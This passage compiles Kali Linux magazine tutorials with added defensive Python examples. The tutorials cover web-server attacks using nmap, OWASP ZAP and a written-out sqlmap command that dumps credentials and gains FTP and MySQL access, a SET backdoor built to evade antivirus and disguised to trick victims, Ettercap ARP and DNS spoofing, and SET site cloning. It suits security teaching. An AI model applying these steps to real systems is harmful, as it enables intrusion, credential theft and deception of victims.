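Before the archive is copied to the phone, a practitioner would check it against the MD5 and SHA1 published with the download rather than trusting the mirror. The following Python script is an added example (it is not from the article or from the zitstif chroot project) that streams a file through both digests, compares them in constant time against the values printed above, and applies the chmod 755 step to the launcher script. The temporary sample file it writes is constructed for the demonstration, and the SHA1 constant is the article's value with its OCR'd "l" read as "1".

```python
"""Verify a downloaded Kali chroot archive against published hashes before it is
extracted onto the phone, then set the launcher script's permissions.
Added example; the hash constants are the values printed in the article."""
import hashlib
import hmac
import os
import stat
import tempfile

# Hashes as printed in the article for the chroot archive (assumed correct
# transcription; the SHA1 had an OCR'd "l" that can only be a "1" in hex).
EXPECTED_MD5 = "d60c5a52bcea35834daecb860bd8a5c7"
EXPECTED_SHA1 = "f62c2633d214de9edad1842c9209f443bcea385d"


def file_digests(path, chunk_size=1 << 20):
    """Return (md5, sha1) hex digests of a file, streamed in chunks so a
    multi-gigabyte image never has to fit in memory."""
    md5 = hashlib.md5()
    sha1 = hashlib.sha1()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            md5.update(chunk)
            sha1.update(chunk)
    return md5.hexdigest(), sha1.hexdigest()


def verify_archive(path, expected_md5=EXPECTED_MD5, expected_sha1=EXPECTED_SHA1):
    """True only when both digests match. compare_digest is used so the
    comparison does not short-circuit on the first differing character."""
    md5, sha1 = file_digests(path)
    md5_ok = hmac.compare_digest(md5, expected_md5.lower())
    sha1_ok = hmac.compare_digest(sha1, expected_sha1.lower())
    return md5_ok and sha1_ok


def make_executable(path):
    """Apply the article's 'chmod 755' to the kali launcher and return the
    resulting permission bits."""
    os.chmod(path, 0o755)
    return stat.S_IMODE(os.stat(path).st_mode)


def write_sample(data):
    """Write constructed bytes to a temporary file and return its path
    (demonstration helper standing in for the downloaded archive)."""
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(data)
    return tmp.name


if __name__ == "__main__":
    sample = write_sample(b"hello\n")           # constructed stand-in file
    print("digests:", file_digests(sample))
    print("matches the published hashes:", verify_archive(sample))
    print("launcher mode: %o" % make_executable(sample))
    os.unlink(sample)
```

Run it on the PC before copying the archive over, or inside the chroot once it is up; a mismatch on either digest means the file should be re-downloaded, not extracted.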

Optional 01

Terminal Emulator can be configured to start the session directly in the Kali chroot environment by adding the following command under Preferences » Initial Command:

su -c "cd /sdcard/kali && sh kali"

Optional 02

Update the distribution by using the following command:

apt-get update && apt-get upgrade && msfupdate

Optional 03

Enhance functionality by adding the tools listed in Table 2 from the app store.

Summary

Kali Linux GUI or CLI, both are equally powerful when combined with the Android platform. Beginners can start using the Kali GUI on a mobile device, and the more experienced who are comfortable with the terminal can have fun using the Kali CLI. In the future, more mobile-based tools and apps are going to flood the markets, and we need to start using mobile devices and smartphones as they are becoming inexpensive and more functional. I hope this article is helpful and informative and encourages you towards the field of cyber security and pentesting.

DANIEL SINGH
ty consultant and prominent speaker at
Table 2. Tools for enhancing functionality

App Name: Description

AndFTP: ftp/sftp client
(name unreadable in source): shows complete Android info
AndroidVNC: vnc viewer client
AndSMB: Android Samba client
Antennas: shows mobile antennas and much more info
AnyTAG NFC Launcher: automate your phone by scanning NFC tags
APG: OpenPGP for Android
APK Dumper: copies apk of selected apps
App List Backup: says what it does
Bugtroid: pentesting and forensics
CardTest: test your NFC enabled credit cards
Checksum: full tool for md5sum and shasum tools
ConnectBot: powerful ssh client
(name unreadable in source): perform DNS and WHOIS lookups
Dolphin Browser: browser that easily allows you to change your UserAgent
DroidCat: inspired by FireCat
Droidsheep: security analysis in wireless networks
Droidsheep Guard: app for monitoring Android's ARP table
DroidSQLi: automated MySQL injection tool
dSploit: Android network penetration suite
Electronic Pickpocket: wirelessly read NFC enabled cards
Exif Viewer: shows exif data from photos and can remove this information
Fast notepad: simple but useful notepad application
Find My Router's Password: title explains it all (mostly for default passwords)
Fing: very similar to the Look@LAN tool for
Goomanager: front end for android file hosting
Hacker's Keyboard: as the name says
(name unreadable in source): translate text into hashes
Hex Editor: hex editor for Android
Hex Pirate: hex editor for Android
inSSIDer: wireless network info
intercepter-NG: multi-function network tool: sniffer, cookie interceptor, arp poisoner
IP info Detective: detailed information regarding the IP address
IP Webcam: turns the Android device into an IP security camera
Loggy: view your logcat in your desktop browser
Maluuba: voice activated assistant
network discovery: computer/device discovery and port scanner
Network Signal Info: graphical tool for iwconfig
network tools: periodic monitoring of websites, servers, routers, surveillance systems, etc
NFC ReTAG: re-use write protected NFC tags such as hotel key-cards, access badges, etc
NFC TagInfo: another NFC reader
obackup: easily backup your entire device to the cloud in one tap
OpenVPN Connect: open vpn client
Orbot: tor on Android
Packet Injection: poor man's GUI version of scapy
portknocker: as name says
ProxyDroid: use your socks5 proxy with this application
python for android: as name says
ReKey: app that fixes the recently-disclosed "Master Key" vulnerabilities
Root Browser: great file manager for Android
SandroProxy: kind of like Webscarab
Screenshot Ultimate: to take screenshots
Secret Letter: poor man's steganography tool
smanager: script manager
smart taskbar: as name says
SSHDroid: openssh server for android
STUN Client: app to find out what kind of firewall/NAT you're behind by using the STUN protocol
SU Update fixer: as name says
SuperSU: manage what programs access root functions
TeamViewer: remotely control Windows, OSX, and Linux based systems
Terminal Emulator: no explanation needed
timely: alarm
tPacketCapture: as name says
VirusTotal Uploader: test your malicious payloads
Voodoo OTA RootKeeper: maintain root access even after updates
Wifi File Transfer: access files on your phone from a web browser via an http server
WifiFinder: simple wireless scanner
WiGLE Wifi: open-source wardriving app
ATTACK

Kali Linux, Attacking Servers

This article will show you how to perform attacks on web servers, getting full access to the system and database, using only some of the 'Top Ten' tools of Kali Linux.



Kali Linux is probably one of the most complete distributions for carrying out penetration tests, and it ships with a great many tools of all kinds. In this article we'll see some examples of how to perform attacks using only a few of the Top Ten tools of Kali Linux, focusing on those designed to attack web servers.

Generally an attack is performed as follows:

• Collection/information gathering.
• Anonymity.
• Search for vulnerabilities.
• Exploitation of the systems.
• Post exploitation.
• Elimination of evidence.
• Executive and technical report.

We will focus on the following: information gathering, searching for vulnerabilities, exploitation and post exploitation.

It is important to know that in this article the tools are used for a specific purpose, but that does not mean a tool can only be used for that purpose. The vast majority of the tools have multiple uses.

Nmap: Information gathering

When we are ready to perform an attack, the first and most important step is information gathering. Knowing all the potential weak points is our goal. To do this, the first thing we are going to do is a port scan with nmap. In this way we will learn what type of services or applications run on the web server.

Figure 1 shows the result of a basic scan launched from nmap, more specifically from Zenmap, the graphical version of nmap. The scan showed a number of open ports on the server, and this may give us some clues as to where to find potential vulnerabilities. The information returned is quite juicy: the server we are attacking has more than one role assigned, and therefore more points of attack.

Figure 1. Result of scan with Zenmap. Multiple open ports (nmap -T4 -F; open services listed: ftp, ssh, smtp, domain, http, pop3pw, pop3, imap, https, smtps, imaps, pop3s, https-alt; msrpc, netbios-ssn and microsoft-ds reported as filtered)
Figure 2. Access denied for mysql backend

Figure 3. Automatic full scan with OWASP ZAP



Some of the services that are attacked:

Port 21 FTP
Port 110 pop3
Port 3306 mysql

These will probably be the most vulnerable, because the rest of the open ports on the server belong to services protected by SSL or TLS, as is the case of HTTPS, SMTPS, POP3S, or SSH. These protocols use robust encryption, which is why it is more complex to obtain a key by brute force, or to crack a password by sniffing the traffic on a LAN.

As an example, both port 21 and port 110 could be subjected to a brute-force attack. On the other hand, port 3306 tells us that mysql is installed.

We will do some of the checks typical of a penetration test, such as trying to access the FTP as an anonymous user, or verifying whether remote access to mysql is enabled.

Figure 2 shows that the mysql backend can only be accessed from within the LAN itself.

However, having a mysql installation and seeing so many open ports makes us think that the web site we are attacking has more than one database dedicated to various services; for example, one database for the main page, another for the blog, and so on for each part of the site. This can mean that some part of the web site is vulnerable.
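The triage the article is doing by hand (cleartext services first, a database listener reachable from outside second) is worth automating over the scanner's own output, since the same list is what a defender reviews after an external scan of their perimeter. The following Python example is added here (it is not from the article or from nmap) and parses nmap's grepable (-oG) output, flagging services that carry credentials in the clear and database listeners that should not be exposed. The host 192.0.2.10, the port list and the version strings are constructed sample data, not the article's target, and the classification tables are the example's own assumptions.

```python
"""Triage an nmap grepable (-oG) result for cleartext-credential services and
exposed database listeners. Added example with constructed sample data."""
import re

# Constructed sample of `nmap -T4 -F -oG -` output for a fictional host in the
# TEST-NET-1 documentation range; not the article's scan.
SAMPLE_GNMAP = (
    "# Nmap 6.25 scan initiated as: nmap -T4 -F -oG - 192.0.2.10\n"
    "Host: 192.0.2.10 ()\tStatus: Up\n"
    "Host: 192.0.2.10 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh//OpenSSH 4.3/, "
    "25/open/tcp//smtp///, 80/open/tcp//http///, 110/open/tcp//pop3///, "
    "135/filtered/tcp//msrpc///, 143/open/tcp//imap///, 443/open/tcp//https///, "
    "993/open/tcp//imaps///, 995/open/tcp//pop3s///, 3306/open/tcp//mysql///"
    "\tIgnored State: closed (89)\n"
)

# Services whose login travels in the clear, with the encrypted alternative
# a defender would move users to (assumed mapping for this example).
CLEARTEXT_AUTH = {
    "ftp": "SFTP (22) or FTPS",
    "telnet": "SSH (22)",
    "pop3": "POP3S (995) or STARTTLS",
    "imap": "IMAPS (993) or STARTTLS",
    "http": "HTTPS (443) for any login form",
}
# Database listeners that should be bound to localhost or firewalled to the LAN.
DATABASE_SERVICES = {"mysql", "postgresql", "ms-sql-s", "oracle", "mongodb"}

# One -oG port entry: port/state/protocol/owner/service/rpc/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)//([^/]*)/")


def parse_gnmap(text):
    """Map host -> list of (port, state, proto, service) from grepable output."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue                      # comments and Status lines carry no ports
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        entries = [(int(port), state, proto, service)
                   for port, state, proto, service, _version in PORT_RE.findall(ports_field)]
        hosts.setdefault(host, []).extend(entries)
    return hosts


def review(text):
    """Return (host, port, service, finding) tuples for open weak services."""
    findings = []
    for host, entries in parse_gnmap(text).items():
        for port, state, proto, service in entries:
            if state != "open" or proto != "tcp":
                continue                  # filtered/closed ports are not reachable
            if service in CLEARTEXT_AUTH:
                findings.append((host, port, service,
                                 "cleartext credentials; prefer " + CLEARTEXT_AUTH[service]))
            elif service in DATABASE_SERVICES:
                findings.append((host, port, service,
                                 "database listener exposed; bind to localhost or firewall to the LAN"))
    return findings


if __name__ == "__main__":
    for host, port, service, note in review(SAMPLE_GNMAP):
        print(f"{host}:{port:<5} {service:<6} {note}")
```

On the sample the report names exactly the three services the article singles out (FTP, POP3 and MySQL) plus the plain HTTP and IMAP listeners, while the TLS-wrapped ports and SSH pass silently; feed it `nmap -oG -` output from your own perimeter scan to get the same list for a real host.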

OWASP: Search vulnerabilities

Once we have some information on the target, the next step will be to look for vulnerabilities with the OWASP ZAP tool. OWASP ZAP can be used in two different ways. The first would be to use it as a proxy in our browser, intercepting all the connections made by Firefox, Chrome, or any other browser.

In this way we can focus the attack on a single point. That is to say, the web site we are attacking probably has multiple URLs (the blog, the main page, the extranet login, supplier access, and so on); by using OWASP ZAP as a proxy we intercept exclusively the part of the web server that we want to attack.

Informational (Warning): X-Frame-Options header not set
Description: X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Solution: Most modern Web browsers support the X-Frame-Options HTTP header; ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).
Reference: http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

High (Warning): Cross Site Scripting (Reflected)
Description: Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.
When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.
There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.
Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.
Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include: message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.

Figure 4. Report in html from OWASP



Figure 5. XSS (cross site scripting) exploited




The other way to use OWASP ZAP to search for vulnerabilities is to do a full scan of the web site.

Later I'll show you how to do it. This option is less advisable than the previous one; however, it can help us when searching for vulnerabilities, because this method is faster. It is less advisable, or better said, the handicap compared with using it as a proxy is that, if you do a full scan of a web site, OWASP ZAP runs through every URL of the site and tries to find vulnerabilities in each part of the web. This implies that the IDS or firewall of the server we are attacking can detect an intrusion attempt.

When OWASP ZAP performs a full scan, it launches all possible attacks, grouping the vulnerabilities found by their criticality.

Figure 3 shows the result obtained by OWASP ZAP on a full scan of the web site we are attacking.

Once we have the result of the scan, the most advisable thing is to take a first look at the potential vulnerabilities, and then export the result as HTML in order to focus on those vulnerabilities we are most interested in.

Figure 4 is the exported result, with the detail of the vulnerabilities found.

One of the vulnerabilities found was an XSS (cross site scripting), and to exploit it is as simple as going to the browser and inserting the URL that OWASP ZAP showed. Figure 5 is the result of the XSS.
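The two alerts in the exported report, the missing X-Frame-Options header and the reflected XSS, come down to checks a developer can run against their own responses before a scanner does. The following Python example is added here (it is not from the article or from ZAP) and shows, first, a header check that raises the same "X-Frame-Options header not set" finding with the SAMEORIGIN/DENY advice from the report, and second, a search page that concatenates its query parameter beside its escaped version, with a probe that detects whether the parameter comes back unescaped. The render functions, the host www.example.test and the parameter name "query" are assumptions of the example.

```python
"""Reproduce the two checks behind the ZAP alerts in the article's report:
X-Frame-Options missing, and a query parameter reflected into HTML unescaped.
Added example; hosts, parameter names and page bodies are constructed."""
import html
from urllib.parse import parse_qs, quote, urlsplit

VALID_FRAME_OPTIONS = ("DENY", "SAMEORIGIN")


def check_frame_options(headers):
    """Return (risk, alert, solution) in the style of the ZAP report, or None
    when the header is present with a value browsers honour."""
    value = next((v for k, v in headers.items() if k.lower() == "x-frame-options"), None)
    if value is None:
        return ("Informational", "X-Frame-Options header not set",
                "send 'X-Frame-Options: SAMEORIGIN' on every page (DENY if it is never framed)")
    if value.strip().upper() not in VALID_FRAME_OPTIONS:
        return ("Low", "X-Frame-Options value is not DENY or SAMEORIGIN: " + value,
                "use DENY or SAMEORIGIN")
    return None


def _query_param(url, name="query"):
    """Pull one parameter out of the URL the way a PHP page would read $_GET."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_search_vulnerable(url):
    """'Before': the request parameter is concatenated straight into the page,
    so any markup in it is interpreted by the browser (reflected XSS)."""
    return "<p>Results for: " + _query_param(url) + "</p>"


def render_search_hardened(url):
    """'After': the same value HTML-escaped, so markup arrives as text."""
    return "<p>Results for: " + html.escape(_query_param(url), quote=True) + "</p>"


def is_reflected_unescaped(render, marker="<i>probe</i>"):
    """Detection logic: request the page with a harmless HTML marker in the
    parameter and report whether it comes back byte-for-byte intact."""
    page = render("http://www.example.test/search.php?query=" + quote(marker))
    return marker in page


if __name__ == "__main__":
    # Constructed response headers: a bare PHP/Apache reply versus a hardened one.
    print(check_frame_options({"Content-Type": "text/html"}))
    print(check_frame_options({"X-Frame-Options": "SAMEORIGIN", "Content-Type": "text/html"}))
    print("vulnerable page reflects markup:", is_reflected_unescaped(render_search_vulnerable))
    print("hardened page reflects markup:", is_reflected_unescaped(render_search_hardened))
```

The probe uses inert markup rather than script on purpose: what matters for the finding is whether the page preserves tags at all, and the hardened renderer passes because escaping turns `<` into `&lt;` before the browser sees it.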



web server operating system: Linux Red Hat Enterprise
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
[12:04:00] [INFO] fetching columns for table 'accounts' in database 'psa'
[12:04:00] [INFO] the SQL query used returns 3 entries
[12:04:00] [INFO] retrieved: "id","int(10) unsigned"
[12:04:00] [INFO] retrieved: "type","varchar(32)"
[12:04:00] [INFO] retrieved: "password","text"
Database: psa
Table: accounts
[3 columns]
+----------+------------------+
| Column   | Type             |
+----------+------------------+
| id       | int(10) unsigned |
| password | text             |
| type     | varchar(32)      |
+----------+------------------+
[12:04:00] [INFO] fetched data logged to text files under ...
[*] shutting down at 12:04:00

Figure 6. Showing the databases with sqlmap

[12:07:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat Enterprise
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
[12:07:51] [INFO] fetching columns for table 'pd_users' in database 'psa'
[12:07:51] [INFO] the SQL query used returns 4 entries
[12:07:51] [INFO] retrieved: "id","int(10) unsigned"
[12:07:51] [INFO] retrieved: "login","varchar(20)"
[12:07:51] [INFO] retrieved: "account_id","int(10) unsigned"
[12:07:51] [INFO] retrieved: "pd_id","int(10) unsigned"
Database: psa
Table: pd_users
[4 columns]
+------------+------------------+
| Column     | Type             |
+------------+------------------+
| account_id | int(10) unsigned |
| id         | int(10) unsigned |
| login      | varchar(20)      |
| pd_id      | int(10) unsigned |
+------------+------------------+
[12:07:51] [INFO] fetched data logged to text files under ...
[*] shutting down at 12:07:51

Figure 7. Results of the table containing the users

Figure 8. Results of the table containing the passwords
SQLmap: Exploiting vulnerabilities

After verifying that the faults discovered by OWASP ZAP are exploitable, we move on to sqlmap, where we enter a somewhat more fun field.

Among other vulnerabilities, we found a possible SQL injection flaw.

The first thing is to check whether the flaw really exists by entering the URL that OWASP ZAP showed us.

Knowing that it is vulnerable, we use the sqlmap tool to automate the SQL injection process.

As with OWASP ZAP, there are two ways to use sqlmap: one of them would be using the wizard, and the other entering the parameters one by one.

Figure 9. Dump of users data and passwords

Figure 10. Full access to the FTP server (FTP directory listing of the site's WordPress installation: actualidad, wp-content, license.txt, readme.html, wp-app.php, wp-atom.php, wp-blog-header.php, wp-feed.php, wp-links-opml.php, wp-login.php, wp-pass.php, wp-rdf.php, ...)

For example, we'd use the following command to find out which databases the server has (Figure 6):

sqlmap -u "http://www.website.es/actualidad/evento.php?id=110" --level=5 --flush-session --dbs

Then, with the options sqlmap offers us, we would get the tables of a database, then the users, and so on until we obtain the passwords. It could even make a dump of the whole DB.
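What sqlmap automates against evento.php?id= is the gap between a query assembled from the request parameter and one that binds it; for whoever maintains the page, the fix is the second form. The following Python example is an added illustration (it does not touch the article's target and is not sqlmap's code) using an in-memory SQLite table named evento that stands in for the article's lookup: the concatenated query, its parameterised counterpart with input validation, and a boolean check in the spirit of a scanner's test that tells the two apart. The table, its rows and the id values are constructed.

```python
"""The flaw class sqlmap automates, shown both ways on an in-memory SQLite
database: a query built by string concatenation versus a parameterised one.
Added example; table, rows and ids are constructed stand-ins."""
import sqlite3


def make_db():
    """Constructed 'evento' table standing in for the page's id lookup."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE evento (id INTEGER PRIMARY KEY, titulo TEXT)")
    con.executemany("INSERT INTO evento VALUES (?, ?)",
                    [(110, "Public event"), (111, "Internal meeting"), (112, "Board session")])
    return con


def lookup_vulnerable(con, id_param):
    """'Before': the request parameter is pasted into the SQL text, so a crafted
    value changes the statement's structure instead of just its data."""
    sql = "SELECT id, titulo FROM evento WHERE id = " + id_param
    return con.execute(sql).fetchall()


def lookup_parameterised(con, id_param):
    """'After': the value is validated as an integer and bound as a parameter,
    so the database never parses it as SQL."""
    if not id_param.isdigit():
        raise ValueError("id must be a positive integer")
    return con.execute("SELECT id, titulo FROM evento WHERE id = ?",
                       (int(id_param),)).fetchall()


def detect_boolean_injection(lookup, con):
    """Detection logic: compare the plain id with the id plus an always-true
    condition. More rows back means the condition reached the SQL parser."""
    baseline = lookup(con, "110")
    try:
        probed = lookup(con, "110 OR 1=1")
    except (ValueError, sqlite3.Error):
        return False                      # rejected before or by the database
    return len(probed) > len(baseline)


if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", lookup_vulnerable(con, "110 OR 1=1"))
    print("injectable via concatenation:", detect_boolean_injection(lookup_vulnerable, con))
    print("injectable via binding:", detect_boolean_injection(lookup_parameterised, con))
```

The parameterised version raises on the probe rather than returning an error page, which is the behaviour to keep in the real application: reject malformed ids at the edge and log them, since that is also where a scanner's first probe becomes visible.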

Sometimes the users and passwords are in different tables; however, this is not a problem, and we can still continue with the intrusion process. Figures 7 and 8 show the users and passwords in different tables.

By dumping these two tables, we get the account id and the password (Figure 9), which, in addition, judging by the user name, I suppose is the user that gives access to the FTP.

And as we saw earlier, one of the open ports was precisely port 21. So we tried to log in and... we're already inside!

Browsing a little through the folders on the FTP, we realize that the web site has a WordPress blog (Figure 10). This makes it easier for us once more to get access to the system...

We downloaded the wp-config file to view the user that connects to the WordPress database, and we try to connect with a mysql client (Figure 11).

Summary

With only 3 programs we have obtained full access, with root permissions, to MySQL. We have also had access to the FTP server where all of the files of the web site are housed, and from where we could get a remote shell.

These 3 tools are in the Top Ten of Kali Linux. They are without doubt the tools to be considered for hacking attacks and penetration testing.

Figure 11. Full access to the MySQL server with the mysql client
Hands-on: How To Create a 'Backdoor' To Remote Access With Kali Linux

Now I will introduce you to a technique that uses SET (Social Engineering Toolkit), available in Kali Linux... Let's create a backdoor that can be used to remotely control a Windows computer.

We will create a legitimate-looking executable, hardly detected by any antivirus, with which we compromise a target computer. I want to point out that all the information here should be used for educational purposes or penetration tests, because the invasion of unauthorized devices is a crime.



A backdoor is a security hole that can exist in a computer program or operating system and that could allow an intrusion into the system, so that the attacker gets full control of the machine.

Referring to a backdoor, this is a 'back door' that may be exploited via the Internet, but the term can be used more broadly to describe ways of stealthily obtaining privileged information from systems of all kinds.

There are cases where the computer program contains a 'backdoor' implemented at the time it was compiled. Generally this feature is of interest when software must perform update or validation operations.

Figure 1. Social Engineering Toolkit, Step 1

Figure 2. Create the Payload and Listener, Step 2

Figure 3. Enter the IP address, Step 3

Figure 4. Set payload, Step 4

Step by Step

I hope to make this walkthrough theoretically simple:

First we access the menu "Applications/Kali Linux/Exploitation Tools/Social Engineering Toolkit" and click "setoolkit". A menu like the one seen in Figure 1 will appear. In the options menu select option 1.

In the second menu select option 4 (Figure 2). 

In this screen you should properly input your IP address. If you have doubts, open a new terminal and type ifconfig eth0, then fill in this field correctly (Figure 3).

In the next screen you should choose the second option to create a reverse connection: our target computer is the one that will connect to the attacker (Figure 4). In the following screenshot we perform 3 steps: first the kind of backdoor, type 16; then we must define the port on the attacker's machine that will be 'listening' for connection attempts made by the target. The default port is 443; you can change it if it is already in use by entering another number and pressing 'Enter'. Next you are asked whether to start 'listening'; you must enter 'yes' (Figure 5).

With these procedures the 'backdoor' will be created and our computer will begin to 'listen' for connections from the target machines.

The executable is created in the folder /usr/share/set/ and is called 'msf.exe'.

The goal is to make it executable, so we can open a new terminal and type the following command:

chmod +x /usr/share/set/msf.exe
Figure 5. Start the listener, Step 5

Figure 6. Starting interaction, Step 6

Figure 7. Ettercap, Step 1

Figure 8. Ettercap, Step 2

Figure 9. Ettercap, Step 3
If you want, you can rename this file to facilitate the social engineering process of convincing someone to open a photo or install a new application.







Figure 10. Start Sniffing, Step 4 
Now we need to copy this executable to the target machine so that it is run there (Figure 6).

Here, entering the command 'sessions' lists the targets already connected.

When we type 'sessions -i 1' (assuming 1 is the ID number displayed by the command 'sessions'; if another number is displayed, just replace 1 with the number shown) we will be able to interact with the target machine with full access.

DNS spoofing attack with Ettercap 
INTRODUCTION 

DNS spoofing is a method in which the attacker compromises a name server (Domain Name System).

The server accepts and incorrectly uses information from a 'host' that has no authority to provide it.

Using this technique, the attacker can direct the 
victim's browser or email to their own server. 

The technique consists of inserting data into a Domain Name System (DNS) name server's cache database, making the name server return an incorrect IP address and diverting traffic to another computer.

Step by Step

Open the terminal. Type the following and hit enter (Figure 7):

# vi /usr/share/ettercap/etter.dns

Just edit and save, exit and then enter 'ettercap -G' to open Ettercap in graphical mode.

Figure 11. DNS Spoof, Step 5

Figure 12. Social Engineering Toolkit, Step 1

Figure 13. Social Engineering Attacks, Step 2

Figure 14. Website Attacks, Step 3

Go to Sniff: 'Unified Sniffing'; when prompted, choose your NIC 'eth0' (Figure 8).

Concepts 

This type of attack is useful for obtaining some credentials during the execution of a penetration test. It consists of sending false answers to the DNS requests that are made. To execute this attack, you must edit the file 'etter.dns'; like the 'hosts' file of Windows and Linux, it lets us configure which answers are sent to which requests. In 'Hosts' click 'Scan for hosts'.

Again in 'Hosts' click 'Host List' to view a list of all available IPs on the network; select the target that will receive the false answers and click 'Add to Target 1' (Figure 9).

Now click on 'Start', 'Start Sniffing'. 

Then go to 'MitM': 'Arp Poisoning'. Select the option 'Sniff remote connections' and click 'OK' (Figure 10).

Go to 'Plugins', 'Manage the Plugins' and double-click dns_spoof (Figure 11).

Once that is done, the selected client will start getting false answers to its DNS queries.
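Seen from the victim's side, the attack above leaves two traces: one MAC address answering ARP for several IPs (the 'Arp Poisoning' step) and DNS answers that disagree with a trusted resolver (the dns_spoof step). The following is an added example, not part of the article and not Ettercap code; the neighbour-table lines and DNS answers are constructed, and the "trusted" answers are assumed to come from a resolver reached over an independent path such as a VPN or DNS-over-TLS.

```python
"""Detect the two halves of an Ettercap-style attack from the victim's side:
ARP poisoning (one MAC behind several IPs) and spoofed DNS answers."""
import ipaddress
from collections import defaultdict


def parse_neighbours(lines):
    """Parse `ip neigh show`-style lines into {ip: mac}; entries without a MAC are skipped."""
    table = {}
    for line in lines:
        parts = line.split()
        if "lladdr" in parts:
            table[parts[0]] = parts[parts.index("lladdr") + 1].lower()
    return table


def arp_poisoning_suspects(table, gateway_ip):
    """Return (mac, [ips], severity) for every MAC claiming more than one IP.

    With 'Sniff remote connections' the attacker answers ARP for the gateway as
    well as the target, so one MAC ends up behind two IPs in the victim's cache;
    a duplicate that includes the gateway is rated high."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    suspects = []
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            severity = "high" if gateway_ip in ips else "medium"
            suspects.append((mac, sorted(ips, key=ipaddress.ip_address), severity))
    return suspects


def spoofed_answers(observed, trusted):
    """Compare A records seen on the LAN with answers from a trusted resolver.

    `observed` maps name -> IP as returned through the local resolver path;
    `trusted` maps name -> set of IPs from the independent resolver. Names the
    trusted resolver did not answer are skipped. Returns (name, lan_ip, reason)."""
    findings = []
    for name, lan_ip in observed.items():
        expected = trusted.get(name)
        if expected is None or lan_ip in expected:
            continue
        reason = "answer differs from trusted resolver"
        if ipaddress.ip_address(lan_ip).is_private:
            # In a LAN attack like the one above, spoofed names point at a local host.
            reason += ", answer is a private address"
        findings.append((name, lan_ip, reason))
    return findings


# Constructed `ip neigh show` output from a victim whose cache has been poisoned:
# the gateway 192.168.1.1 and the host 192.168.1.50 share the same MAC.
NEIGH_LINES = [
    "192.168.1.1 dev eth0 lladdr aa:bb:cc:dd:ee:ff REACHABLE",
    "192.168.1.50 dev eth0 lladdr aa:bb:cc:dd:ee:ff STALE",
    "192.168.1.20 dev eth0 lladdr 08:00:27:12:34:56 REACHABLE",
    "192.168.1.99 dev eth0 FAILED",
]

# Constructed DNS answers; 203.0.113.10 and 198.51.100.10 are documentation-range addresses.
OBSERVED = {"www.example.com": "192.168.1.50", "mail.example.net": "198.51.100.10", "intranet.local": "10.0.0.5"}
TRUSTED = {"www.example.com": {"203.0.113.10"}, "mail.example.net": {"198.51.100.10"}}

if __name__ == "__main__":
    for mac, ips, severity in arp_poisoning_suspects(parse_neighbours(NEIGH_LINES), "192.168.1.1"):
        print(f"[{severity}] {mac} answers for {', '.join(ips)}")
    for name, lan_ip, reason in spoofed_answers(OBSERVED, TRUSTED):
        print(f"[dns] {name} -> {lan_ip}: {reason}")
```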




Cloning Site with Kali Linux 
INTRODUCTION 

SET Attack Method: 

The Social Engineer Toolkit (SET) has been developed to perform advanced attacks against the human element. SET was designed to be launched with http://www.social-engineer.org and quickly became a standard tool in the arsenal of penetration testers. The attacks built into the toolkit are designed to be focused attacks against a person or organization used during a penetration test.

This hacking method works perfectly together with the 'DNS spoofing or Man in the Middle attack method'.

I will present how an attack method like this can compromise a computer in a few steps.

Step by Step

Go to Applications: Kali Linux: Exploitation Tools: Social Engineering Toolkit, then select 'setoolkit' (Figure 12).
SET menu text (Figure 16):

The second method will completely clone a website of your choosing and allow you to utilize the attack vectors within the completely same web application you were attempting to clone.

The third method allows you to import your own website, note that you should only have an index.html when using the import website functionality.

Figure 15. Java Applet Attack, Step 4

Figure 16. Site Cloning, Step 5

Figure 17. Web Templates, Step 6

Figure 18. URL to be cloned, Step 7



Then select the option 'Social Engineering Attacks' by its number. This will open another window (Figure 13). Then select the option 'Website Attack Vectors', which is the unique way of using multiple web-based attacks... (Figure 14).

After that select the 'Java Applet Attack' method, which will spoof a Java Certificate and deliver a 'metasploit'-based payload (Figure 15).
